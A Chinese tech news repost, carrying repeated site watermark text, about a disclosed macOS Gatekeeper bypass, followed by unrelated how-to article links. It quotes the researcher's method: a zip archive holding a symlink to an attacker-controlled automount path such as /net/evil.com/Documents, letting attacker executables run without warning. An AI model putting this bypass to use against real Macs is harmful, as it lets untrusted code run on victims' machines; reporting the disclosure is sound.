研究人员称:macOS Gatekeeper安全机制中存在大漏洞

引述外媒报道,安全研究员Filippo Cavallarin已经公开了他所说的绕过macOS的Gatekeeper安全功能的方法。截至上周发布的macOS 10.14.5版本,苹果仍然没有解决旁路问题。SyM搜集对生活有用的优质文章

SyM搜集对生活有用的优质文章

Gatekeeper是一种macOS安全工具,可在下载后立即验证应用程序。这可以防止应用程序在未经用户同意的情 当用户从Mac App Store外部下载应用程序时,Gatekeeper用于检查代码是否已由Apple签名。如果代码尚未签名,则在用户未授予权限的情况下,该应用程序将无法打开。SyM搜集对生活有用的优质文章

然而,Cavallarin 在他的博客上写道,Gatekeeper的功能可以被完全绕过。在当前的实现中,Gatekeeper将外部驱动器和网络共享视为“安全位置”。这意味着它允许运行这些位置中包含的任何应用程序而无需再次检查代码。他接着解释说,用户可以“轻易”欺骗安装网络共享驱动器,然后该文件夹中的任何内容都可以通过Gatekeeper。SyM搜集对生活有用的优质文章

安全研究员解释说:SyM搜集对生活有用的优质文章

第一个合法的功能是automount(aka autofs),它允许用户仅通过访问“特殊”路径(在这种情况下,以“/ net /”开头的任何路径)自动挂载网络共享。
例如,'ls /net/evil-attacker.com/sharedfolder/'将使os使用NFS读取远程主机(evil-attacker.com)上'sharedfolder'的内容。
第二个合法的功能是zip存档可以包含指向任意位置(包括automount enpoints)的符号链接,并且MacOS上负责解压缩zip文件的软件在创建它们之前不会对符号链接执行任何检查。

这是如何工作的一个例子:SyM搜集对生活有用的优质文章

为了更好地理解此漏洞利用的工作原理,让我们考虑以下场景:攻击者制作一个zip文件,其中包含一个指向她/他控制的automount端点的符号链接(来自Documents - > /net/evil.com/Documents)并将其发送到受害者。
受害者下载恶意档案,提取并遵循符号链接。
现在,受害者位于受攻击者控制但受Gatekeeper信任的位置,因此任何攻击者控制的可执行文件都可以在没有任何警告的情况下运行。设计Finder的方式(隐藏.app扩展,隐藏标题栏的完整路径)使得这个技术非常有效且难以发现。

Cavallarin表示,他于2月22日向Apple通报了这一漏洞,该公司应该在上周发布macOS 10.14.5时解决这个问题。然而,截至该版本,该漏洞仍未得到解决,Cavallarin称Apple已停止回复他的电子邮件。他正在宣传这个缺陷,因为他给苹果公司提供了90天的窗口。SyM搜集对生活有用的优质文章

也许你还喜欢

图片格式转换器ico图文教程详细解

ico格式也是我们经常接触到的如桌面的图标,也有一些公司的标志等等,那么怎样把图片转换

360随身wifi2使用教程图文解说

只要你的电脑上着网,不管是台式还是笔记本,只要插上360随身wifi二代,你的手机就能接受到

打电话对方听不到我的声音图文解决

伴随着五一小长假的临近,各种音乐节等演出活动纷纷拉开了序幕。2021年,草莓音乐节计划举

怎么网页翻译成中文操作步骤图文详

现在很多人都在使用电脑,那么怎么设置英文网页变成中文呢?今天小编为大家讲讲,希望能够对

怎么root安卓手机操作步骤图文详解

使用安卓手机的用户们,对手机root并不陌生,有的朋友们为了预装一些app,或者使用一些高级

kakaotalk怎么用以及注册方法图文

kakaotalk电脑版是一个功能和国内的微信差不多的手机聊天软件,拥有windows、iPhone、An

笔记本如何设置wifi热点图文操作步

虽然很多手机支持wifi,但是不加密或者知道密码的wifi热点却寥寥无几。笔记本的无线网卡

如何查车辆违章记录图文教程最新分

生活中车辆违章很常见,但如何快速的查询自己的违章记录呢?下面就由小编带你一起共同查询

删除浏览器上保存的密码具体操作方

有时候我们会遇到一些问题,比如如何删除浏览器上保存的密码?下面就为大家介绍一下。

怎样删除浏览器具体操作方法图文介

现在给大家介绍一下怎样删除浏览器